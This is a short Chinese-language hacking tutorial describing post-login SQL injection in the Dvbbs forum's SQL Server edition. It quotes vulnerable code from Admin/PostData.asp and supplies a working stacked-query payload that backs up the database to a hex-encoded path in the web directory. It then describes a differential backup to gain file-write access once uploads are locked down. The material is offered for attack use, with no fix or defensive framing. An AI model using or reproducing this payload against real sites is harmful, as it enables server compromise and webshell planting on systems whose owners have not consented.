动网论坛(SQL版)后台注入方法

假如通过某些方式进了动网后台,但是管理员牺牲上传的功能把网站目录权限设置为禁止写入,或者说允许某些目录写入但是没有脚本执行权限,怎么办?大家都知道sql版好歹也可以差异备份,但是呢,注入点在那.前台?呵呵!我想不是大牛一般没人还能找到了吧.既然进了后台,大家就从后台找找看.

Admin/PostData.asp里面有这么一段
sub update()
Dvbbs.Execute("update Dv_setup set Forum_NowUseBBS='"&request.form("TableName")&"'")
Dvbbs.loadSetup()
Dv_suc("更新成功！")
end sub

嘿!漏洞出现了吧.再发一下利用工具

dv_bbs1';declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x45003A005C004C006F006E00670053006900740065005C007700770077002E0035003600630063002E006
3006E005C006200620073005C00410064006D0069006E005C0064006100740061002E006A0070006700 backup database @a to disk=@s;--

保存为htm文件即可.先登陆后台,然后直接用那个浏览器打开整个htm文件,在那写sql语句,我想大家都知道了吧,然后差异备份一下,ok了~~~`

其实可能碰上这种情况的朋友不多,但是,没准还真让你碰上了呢。